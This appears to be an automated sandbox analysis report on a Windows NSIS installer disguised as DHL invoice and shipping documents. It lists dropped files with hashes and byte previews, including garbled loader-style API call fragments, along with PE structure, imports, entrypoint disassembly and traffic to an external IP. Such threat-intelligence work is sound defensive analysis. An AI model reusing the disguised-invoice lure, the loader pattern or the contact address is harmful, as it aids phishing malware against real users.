                                          Preview:.....^^...............J...&....@@@@..........K......-...Z.....---........&&.................RRRk...e...r...n...e...l...3...2...:...:...C...r...e..Ta...t...e.wwF...i...l...e...A...(...m... ..|r..#4... ...,. . ...i... ...0...x...8...0..20...0...0.l.0...0...0...,... .2.i... ...0...,.]. ...p... ...0...,... ...i... ...4.bb,..b ...i... ...0...x...8...0...,... ...i... ...0...)...i.......r...8...q...k...e..}r.x.n...e.kkl...3...2...:...:...S...e...t...F...i...l...e...P...o..Mi...n...t...e.>.r...(...i... ...r...8.11,... ...i... ...2...3...0...1...2... ...,... ...i... ...0...,.33i... ...0...)...i.b.....r...4...q.QQk...e..\r...n...e...l...3...2...:.&&:...V...i...r...t...u...a...l...A..Ml...l...o...c...(...i... ...0...,...i... ...8.>>0...7..w1...1...6...8...0...,... ...i... ...0...x...3...0...0...0...,... ...i... ...0..wx...4...0...)...p.......r...2...q...k...e.X.r..Mn...e...l...3...2.I.:..o:...R.JJe...a../d...F...i...l...e...(...i... ...r..h8...,... ...i... ...r...2...,... ...i... ..48.oo0..H7...1
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3861
                                          Entropy (8bit):4.8950653795254695
                                          Encrypted:false
                                          SSDEEP:96:GKEfl8Ry/OyCvfcyh5ph9whBJQRaTYbEVr1wbd:MfObXc2h9iQUDZ1y
                                          MD5:2B5A33F2637CE6016495BE603413514E
                                          SHA1:571279989D47FF42C2974CDEDEA4C872CB9424CF
                                          SHA-256:46F41A0D8B9B891702F9ED2FB60FF737A2275011882501155B710EF9BA8577C7
                                          SHA-512:F55FE759C0DF2E8B9E38962E386BEB468FD4442714233F5A5DD13CA10647411FD62D966D8363FE50568F15525EEE815493AEDEF112A6FA6FA0B506A97AF21CF6
                                          Malicious:false
                                          Preview:.N..........b..Q...G..p.1...;...f._......X.........+..................1r.ES...9...~..C...?B...........IpF........0.......3...............S.......w..>?...$.....J...q..............K..................l........................;.......!.....................I.:..................S......4..kZ.../..................d.......a..............cs....9.......l......(....h.....F..'.V..........}..&C.;U..........._...............N..#.V...................:..".............j...?.....K...H.....s................._....L...1.....Z..L........."..........J.......1......`.......1..........@.y.......6...P...]....Z..........................Ob.....L.....U..cZ..n.CXq.........0...q.......K..........U...K....@/..|.......... ..|......pN.E......................>......?..Z=k....<............S......p.<..3..........1o.......Il.....3.y.................2....(.!.i(XC...b...Le..`.........@............*........=.....=v.=.'..>.............?........].Y..m........."$^L..^A...u......O....K9.3.......................;uG..*.
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3435
                                          Entropy (8bit):4.910328234136937
                                          Encrypted:false
                                          SSDEEP:48:P/sA7KBdAWdry+HEnrwU7j9mS/QwZ/kQMlzuVm+aAIBzx396upw/QAa/rl0:sA70/BEwy9D/XDVtIBzx3oupIa/6
                                          MD5:4A27BE5B33E9690FFCC4087DE6B78DE1
                                          SHA1:808A634035F94A20441F52F413777897DFD7D3E0
                                          SHA-256:CA6742E9E11A6E3008BAE84674451A7228E0E79F53A34235269984EFAE996C72
                                          SHA-512:6D4114A7DCF410C531465AEE6802A3A0A965864DD4AE65E304188931D17C394B3A700DA6558CCB2BF37AA99906D34A1E38E7CF62E655A6E2EAC3E5CDC38449E9
                                          Malicious:false
                                          Preview:.*.....G.[..........*Wd......^..................;{..+........o..a.....g..2......BN...........m`..{...g..k..(..........Z.s...Z....|.`.$....u..m..@.b.h.........n[.q...!.....(B.C..........4KC..................v.......[.q.i.......ug...g...E.....A..[..o38..........N.^.......y.p.z....._.!..........<.,..I.Y..G................._....;\.&........\.....bu..>...........=...r..y...}....`|7.......w...2...........*od.C.......................... ....................ul._9.4<...~..........................e]...+.....i.......... _....................l...........z.u..2f...4...$.Pg................J............h...D.......R.3..........G!..w.r."..........{.JS8........O.P....m...'.......rS..........1..2....0.......+....M...0.....Y...:.*........Q....g.l.q......'.r$..........7............6.........o..2..5...........%.0...:.........G......................|............._...8.P...................|.......r...........M.......6~...B...g.d.........5....'...................3....Y...}.4L.DT,.....R..Ds....7.........
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1618
                                          Entropy (8bit):4.660461986408
                                          Encrypted:false
                                          SSDEEP:48:mV2wmwMfFEXBaoCpI1sCEVHQTtlgJtScnbhH7D:maNK/0IOQjgJhx
                                          MD5:5A5EB5C7789F88A3DCC3F79DB0AA1A49
                                          SHA1:E67C28DEF4C59F267095C50C6A571AB5B65A9D04
                                          SHA-256:3A7318B3E11D39D783BA8BCCCAD3541B6896A03B1533E4F189DFD1CCC2FF40CE
                                          SHA-512:9762CD2524E971CF672D8DD8F46F4E7EE3F0FF5D91D11801AECB135DF9FBA6FC93D5FCC131879C1D3A81F2734AC5D6E07016E6CEC131A5F51C54CFE0664D0238
                                          Malicious:false
                                          Preview:...b..>.P.....k.................`T...........-.8...$....#P...f..9%......Y.9....o............C...#...............O|......9......u.............e......D=.A...............x...c....5^..?....G..h.....'..........k....../............Bn........i........&..............5Q..4........@..C......7.;....t....5...............C..x..................H...@.....>.......9.h..c......3..9W..$......v.....~.........!.......Y...."X.....N..|......d....Z.[.......+j.....@xB..w..S.........N.............J......u...................n....x....'..R.n.;...=.H`............................3...c.e..F..C.....n.0n..).......Y...Z..0..I.Q...Y.......H-...W..Q......<.`......l.........".S...Mg.8...X.........0/........[..$.........R...p.k-......S....`.....................k.....@......L.8.$....\M..............>.l.................d...O............R....+.................g..x.....>..b......V-..w...../...8......G......Q..........}..G..............'....................v.......m.}:...I$...........".M...J........._*..{...........
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2322
                                          Entropy (8bit):4.685927571910316
                                          Encrypted:false
                                          SSDEEP:48:hKk/USLt/YV/KNG2/Jddel368ugS8jMMccq3mtjzlrNiNviupW9:hb/USL1YV/K/TdeQ8jMMcYn3Opq
                                          MD5:C4A322BD2B1B0FD5130E2119EBE14A09
                                          SHA1:4C0F0F8AAC954E9D599F8C89B340F5C3C4742A6B
                                          SHA-256:063D6E2970210F7A4C74FE744AD76E71650AB5CB974EE4A9AF2BF446D6B2B3BF
                                          SHA-512:64FCE5DC8E510DCCAEA30E2BDB0671C706CECFB4AEC19ECD5B6326E4EE4B1B33A422E917A522F0CFCA184007ABE2B9D89EA401757A637D8D3DFA4B156E58A04A
                                          Malicious:false
                                          Preview:..e..k......Dh........=........z...W...m5K...0...R....4:.L....p.........-.......>...`..#.^.......>...d.d..7..........E...5N...@.......................K......:.o........t....... ......;....e.....R............>......,..&.|...................l+..e....q..Cf....U|..I.X.....U..e.G.....f.........&.......A....................9..}....E...............~.....9...q......T...G.....( ..t..x.......y......[.........Hh....GC9...........Q......C..N..Qt.~.......x.....L.......1.............................T..........V....6.....Ajt..@.....?...............$X.......m.n..........,.U......7.......X.................V........W......\P..............PE.....w......F....:.'9H....;eB.....{+.{.J....s........F....:......X..k.........../.......?.Z..+.....>.F..`1T....2.3.I7...`..{....k.u......b.......J+D...........Y8..y......UU...............3./...... .....[........]N6...y.e.........H..............m...........\.........V..[........W...&.U..........2..r....C....U.3....?...~....Wz......W.....|.C.......a,............
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2438
                                          Entropy (8bit):4.834166284053989
                                          Encrypted:false
                                          SSDEEP:48:QMQ2WErZ2pGC24S3HorZ9JAGA8jkcrbs1DHkkkIq/iSlcHKMVi:X59ys3HorNAGArcr2c/WKWi
                                          MD5:6C88CA43B6FA2E51F1BE781CDF1A7C3E
                                          SHA1:85E53052FFFD4D9AB7FD255A39628FB9D9A4C57D
                                          SHA-256:87747776DBB97E3892F3B4FE2507A907737E3E01F94F88B0D0ED7D849EFD31CF
                                          SHA-512:4B12F969637C61A8F6E1EF79DB3D54DC076672E35B1F67B9742F3B99A38F933298E2DB262A5DB487E281B85BF37FF74FB036E5C5AA3D6844B2D8AC0937B0F483
                                          Malicious:false
                                          Preview:...-....?..A..d.Z..............!.........\..j+.\...E.C..0.6........3.......K....E.....x....g..l.A............Ic........)P.7e.?.......v...|...Q.....h..<.....>........v6.=..;....@...............8,.........W....4.w... ..y......n._...L.IFr.....N...w...U..........H...%.......)......n..<K...:.........o...x..<........0....I...!&.......<.....p..._...........s.......L.......O...F...........p.......c..c.........%.]........X.........-......X.....{.x........^."...x...N....,..........1......)WD.+.[........?P..........4....6...........Z.B............R....;.....e.(.....7...}.........P....3...7B.....(...................................$........O.-"...k....]..........]....F.)...........)......v.....^..Q.......f}......!....0.........=........................m...........A....Q...(w...a......J3...U.n....\0...M..)......Y.....P..#...........p..R........N..^...R.............'.{.............y....g.....^L.......X.............t=z...VP..|.........l..E.-..(..F.....q..I....p..N\.......S.....f1.......4.
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3194
                                          Entropy (8bit):4.87998401204962
                                          Encrypted:false
                                          SSDEEP:48:rpEyDeY5QtYx201GaEtVnQvy5Dv6Z3JIV50tFh1FrDopL0AHmEMAaovQIS+GO/m+:fDeATGaETkd5J8e51xMYOey/mgRbP
                                          MD5:73DC0D944FBB5219CEDD966AF6EBB2C8
                                          SHA1:24D17D23C94CFC76FEF577CAF82C6D45B6125591
                                          SHA-256:3C2F20CCCBB8EEC2F5B2A70E44EC1631BFC8070C2F5A9198F1096563A8D0FA52
                                          SHA-512:72FE2BEEAFE7F5296FA346947E0BE3824B934545A299BFCB4AEBA9BD095AA7A2756E42C9D88E5DDDD072C931D35075AED7C7D4E3B641F74A62C96E150C573E4F
                                          Malicious:false
                                          Preview:........F...........].....<.~......d.............Y..1t...o...(...XA...~.h.qE-...KY..........F{....X............E)....x...R}......$$.}..6.......h+...9&.....c.....+.f..d........!.C....E.z../.....MZ............g.......\..?....@.....s..k.P}......$.<...........aE....!q.........*..e.V.q.b..Ui.R..>.h..R.F...........jM.W..G...^.l.....%.........D......*.v.P.=....s<.....D".....0.).$...B......+..*.B......N..o....o../....z..................G..............%..L..Y.....r.B.Zn..I...x...f.............)....6........?..............."..............'....-......G.................x..C...............t....`.................Q.a....}....e...................i.............0.q.....G..#......t....../]..hH.(......C.Y.z4...y........T..E...E....3....i....._........>.?.p...e....y..)?...o..i....5...S.$.....,.............\.......)..u.........8............p..\......... .........3...9....t...._..o......#U...r0..................g..............n.....d.....b....qE...............4..%..j..0Y.P......(.z...........R<C....
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):434
                                          Entropy (8bit):4.287029634434794
                                          Encrypted:false
                                          SSDEEP:12:THnAEO/X/lz5Qxq70QPiETlsieWr5hmhAZYOua3Jy6:kt5CqtPT7rUk3f
                                          MD5:D831A4A6C7B8B672C51DC73C42BF1B99
                                          SHA1:2EFA4039C5CBBE38D45B65CFCD8CB283B0B00F6F
                                          SHA-256:57B3854CDF7B15EB58BFD24E92F41E8B4A513F9A413E7981891B71F5BD56F4B8
                                          SHA-512:D5920BC02B61C18C83CE48D41AE1777F50685766A60CCB6C53161B25E3AFB34A1DDB0E8710C37E3B8B050F772E3EAB3A65FB4ACB093AEFD55AA2FDA74EC6C8F7
                                          Malicious:false
                                          Preview:chertier urduet extrabronchial foruroliger weakliest digesters glansbillederne weretiger superinfiniteness halisteretic udkommentere snowbourn gldstninger..resknderens landhandler ujvnheds rankerne rykkedes,kosos skabelseshistoriens sklves newsmagazine,timberman civilists expection unlowered agrostology landsplanlgnings stereoisomerism.parablen pachydermatoid jumpsuits kraftens estraden.misocapnic blygraa perirraniai flaskebakker,
                                          Process:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File Type:Atari 68xxx CPX file (version 0000)
                                          Category:dropped
                                          Size (bytes):262838
                                          Entropy (8bit):7.457586703099572
                                          Encrypted:false
                                          SSDEEP:6144:AwCzB8jIN1rI6nre9wQLONw0htBT+FEoiiG0op9HhwMxtAXadr:VQ8jIjI6nlQLO+gtsFEXigfHtJdr
                                          MD5:E0DD1EA179AE4ABFB91E06A8EA7376A3
                                          SHA1:76D67F6C2E204C910EE2B234400F1BF5624D5FD4
                                          SHA-256:F8C468F8E00452469AE2BAD42E527970523EF9618E3F2DDE412A7CC3A4C88192
                                          SHA-512:863259B1AB174E5FD39EE2F5779DEF817C8539F5CC89A123FCED9B629245436847777354ADE01B2E38D902A0EF51E6E235E2DCE1FD304EECA7700FBD3105166A
                                          Malicious:false
                                          Preview:.ddddd................&.$.000.......8............uu.-....&...........Q..........j.,........RR..f....................&&.....000.......X............T............................................Z....j..........................qq.........B..>>...................................xxxx.......................>.........RR........~..YYYY.........[[[..............W.tt........kk.....ll.......p........................-........v...n.............................""".h.........T......QQ.,,.......{.....................a.].<<...........xx........JJJ..55.a.Y............................Y.JJ...............................E..[[.r...z.......4444.....%...............9........}.N..........b.................................AA...............D......................>..TT.::..cc...JJJJJ..........c.\.............................I.......gg.........b.ZZZZZZ..::...........RR..........M....99............................................&..~..........<.....NN.......JJ.>..................."...........hh.............mm.,.....
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.450674864990241
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          File size:510'664 bytes
                                          MD5:6a8d426b602c62ff313a431b6f026b6b
                                          SHA1:e7955a9399f8d836ed29c99463ba8e4fbae34364
                                          SHA256:1baf9b4c1a0152616a56d2212c88af4f5e791257f54ee3252ba0cefa4f587a07
                                          SHA512:b0c5d006955050825e2846b76291eaadec36f3df4c13312d95cdf3cc3fea64c952823d9bc386096e69f3eae71afcd79250f5d9f272838c9afc76c6a502cde123
                                          SSDEEP:12288:c19+dlfwYKZWegMLzt56trFwX78iVDtWDlLHciPe:PdloYK7gMLztstrS8ctWD67
                                          TLSH:ADB4DF13F723C8EBDA3D12F1A9A2D7762EE4101A99B1D1DCE7E5BE4770009263B09365
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@
                                          Icon Hash:eb9b9b2bbb9be371
                                          Entrypoint:0x4033d8
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:671f2a1f8aee14d336bab98fea93d734
                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 00000224h
                                          push esi
                                          push edi
                                          xor edi, edi
                                          push 00008001h
                                          mov dword ptr [ebp-14h], edi
                                          mov dword ptr [ebp-0Ch], 0040A188h
                                          mov dword ptr [ebp-08h], edi
                                          mov byte ptr [ebp-04h], 00000020h
                                          call dword ptr [0040809Ch]
                                          mov esi, dword ptr [004080A0h]
                                          lea eax, dword ptr [ebp-000000C4h]
                                          push eax
                                          mov dword ptr [ebp-000000B0h], edi
                                          mov dword ptr [ebp-30h], edi
                                          mov dword ptr [ebp-2Ch], edi
                                          mov dword ptr [ebp-000000C4h], 0000009Ch
                                          call esi
                                          test eax, eax
                                          jne 00007F9C6862A0C1h
                                          lea eax, dword ptr [ebp-000000C4h]
                                          mov dword ptr [ebp-000000C4h], 00000094h
                                          push eax
                                          call esi
                                          cmp dword ptr [ebp-000000B4h], 02h
                                          jne 00007F9C6862A0ACh
                                          movsx cx, byte ptr [ebp-000000A3h]
                                          mov al, byte ptr [ebp-000000B0h]
                                          sub ecx, 30h
                                          sub al, 53h
                                          mov byte ptr [ebp-2Ah], 00000004h
                                          neg al
                                          sbb eax, eax
                                          not eax
                                          and eax, ecx
                                          mov word ptr [ebp-30h], ax
                                          cmp dword ptr [ebp-000000B4h], 02h
                                          jnc 00007F9C6862A0A4h
                                          and byte ptr [ebp-2Ah], 00000000h
                                          cmp byte ptr [ebp-000000AFh], 00000041h
                                          jl 00007F9C6862A093h
                                          movsx ax, byte ptr [ebp-000000AFh]
                                          sub eax, 40h
                                          mov word ptr [ebp-30h], ax
                                          jmp 00007F9C6862A086h
                                          mov word ptr [ebp-30h], di
                                          cmp dword ptr [ebp-000000C0h], 0Ah
                                          jnc 00007F9C6862A08Ah
                                          and word ptr [ebp+00000000h], 0000h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x33c30.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x660c0x68003b90adcd2f1248db844446cb2ef15486False0.6663912259615384data6.411908920093797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x13400x1400b3bd9ad1bd1020c5cf4d51a4d7b61e07False0.4576171875data5.237673976044139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x251380x600c4e774255fea540ed5efa114edfa6420False0.4635416666666667data4.1635686587741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x300000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x430000x33c300x33e007fa7729fe4a0557bfedd7b90570ef402False0.497632718373494data6.34541536700329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x433880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.30904708387554714
                                          RT_ICON0x53bb00xb761PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867930557034827
                                          RT_ICON0x5f3180x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.3459112886272861
                                          RT_ICON0x687c00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.391913123844732
                                          RT_ICON0x6dc480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.4092465753424658
                                          RT_ICON0x71e700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.4437759336099585
                                          RT_ICON0x744180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.5302532833020638
                                          RT_ICON0x754c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.6196721311475409
                                          RT_ICON0x75e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.6524822695035462
                                          RT_DIALOG0x762b00x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x763b00x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x764d00xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0x765980x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x765f80x84dataEnglishUnited States0.9242424242424242
                                          RT_VERSION0x766800x270dataEnglishUnited States0.5016025641025641
                                          RT_MANIFEST0x768f00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                          DLLImport
                                          ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                                          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                                          ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                          USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                                          KERNEL32.dllCreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 1, 2024 12:26:04.316931963 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:04.558083057 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:04.558362961 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:04.558748007 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:04.801783085 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:04.801820993 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:04.801851034 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:04.801911116 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:04.802149057 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:04.802284002 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.043540001 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043580055 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043620110 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043642998 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043663979 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043694019 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043715954 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043737888 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.043874025 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.044001102 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.044001102 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.284442902 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284460068 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284482002 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284616947 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284647942 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284662008 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284674883 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284687996 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284702063 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284766912 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.284766912 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.284812927 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284830093 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284852028 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284866095 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284878969 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284921885 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.284924030 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.284924030 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.284935951 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.285114050 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.285237074 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.285237074 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526068926 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526103973 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526118040 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526129007 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526139975 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526158094 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526169062 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526211977 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526262045 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526303053 CEST8049738109.248.151.29192.168.11.20
                                          Jul 1, 2024 12:26:05.526386976 CEST4973880192.168.11.20109.248.151.29
                                          Jul 1, 2024 12:26:05.526422977 CEST8049738109.248.151.29192.168.11.20
